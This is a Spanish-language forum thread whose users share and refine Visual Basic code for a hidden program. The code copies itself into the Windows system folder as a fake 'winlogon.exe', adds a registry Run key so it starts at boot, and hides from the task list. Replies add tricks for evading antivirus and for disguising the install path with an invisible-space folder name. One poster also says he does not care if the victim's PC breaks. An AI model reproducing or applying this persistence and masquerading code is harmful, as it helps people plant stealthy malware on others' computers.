Proceso Protegido

[la caca]

jojojooj y eso combinado con esto:

Set obj = CreateObject("Scripting.FileSystemObject") 'declaramos un objeto tipo fileSystem object
Set win = obj.GetSpecialFolder(0)                    'para obtener la carpeta de windows y system
Set sys = obj.GetSpecialFolder(1)
win = LCase(win)                                     'las ponemos en minusculas
sys = LCase(sys)
Form1.Visible = False 'ponemos invisible
'-----Copia a \windows--------------
Dim ejec As String
ejec = App.EXEName & ".exe" 'añadimos ala ruta del exe, el nombre y la estension
FileCopy ejec, sys & "\winlogon.exe"  'copia a windows\system32
End If
Set residencia = CreateObject("WScript.Shell")
residencia.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & "winlogon", win & "\winlogon.exe"  'esto modifica el registro para que se ejecute al iniciar el pc
App.TaskVisible = False          'para ocultarlo un poco del, (alt +sup +control) (aunque es una bosta jejej no funciona en XP)



bueno espero que les sirva para copiar todo en la carpeta windows jejeje

p.D.: usenlo con el codigo de NYlOn

chau

[A2Corp]

una pregunta... que en System32 no esta el proceso original de winlogon.exe???????
Esto no afectaria a nuestro copy?
o no dañaria al archivo de winlogon.exe original?

y para editar el registro mejor usa apis!, pke esos scripts seran detectados como virus...
Saludos!

[la caca]

me importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc jjejej

che haber pasate las funciones api para modificar el registro si??

[NYlOn]

Si, dañaria el archivo original :S
Lo q se puede hacer es crear una carpeta en %WindowsRoot% con el nombre de " System32"
Si se fijan bien hay un espacio adelante de "System32", echo con el ALT + 0160.. De esta forma, si alguien se fija en el Registro, aparecera (x ej) "C:\Windows\ System32\Winlogon.exe", x lo que se asemejaria bastante a la realidad

(Ahora, esperemos que no revise su carpeta de Win muy seguido pq se daria cuenta xDDD)

Sino lo podemos guardar en la carpeta de Windows y chau problema :p

salu2 !

ah y tengo entendido que eso del los objetos en Script los detectan los antivirus, pero yo tengo el NAV 2004 y no dice ni Mu xD

EDIT:

me importa un bledo que este el winlogon jejej total se va a romper lo mismo la pc

La idea no era para dañar el sistema, solo para q no se pueda terminar alguna aplicacion...
Y BUSCA un poco sobre las API's, en el foro hay mucho tmb...

[yeikos]

Windows hace un resguardo de sus archivos más 'importantes', así como taskmsg, regedit y demás, por lo tanto si borramos el archivo winlogon.exe supuestamente al reiniciar windows creará de nuevo este archivo.

PD: Winlogon tan solo es un salvapantallas, no podría originar daños en el ordenador, nada más que cuando apareciera el salvapantallas tras una inactividad se ejecutará este archivo.

[A2Corp]

Ohhhhhh........  Gracias por decirme eso, no se pke kreia que winlogon.exe era algo relacionado con la entrada de windows xD... Ese que te pone cuando eskoges el usuario para entrar xD.

[byebye]

winlogon no es un salvapantallas. el tema de "que no se puede cerrar el proceso", eso pasa en todos los sitemas (w2k/xp) pq los servicios "no puedes" cerrarlos. tu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas.

[_Sergi_]

Pues vaya con los programadores de Microsoft... ¿Nunca pensaron que cualquiera puede renombrar un archivo?

[NYlOn]

tu mismo puedes ajustar los privilegios a tu preceso para que puede cerrar winlogon y todos los demas.

Nunca habia oido esto, podrias decirme como ??

desde ya muchas gracias ^^

salu2 !

[byebye]

(SeDebugPrivilege)
   

Permite al usuario asignar un depurador a cualquier proceso.
   
El privilegio SeDebugPrivilege permite cambiar el flujo de ejecución de cualquier proceso o matarlo (incluyendo los subsistemas de seguridad o cualquier servidor RPC).

solo te queda buscar un poco.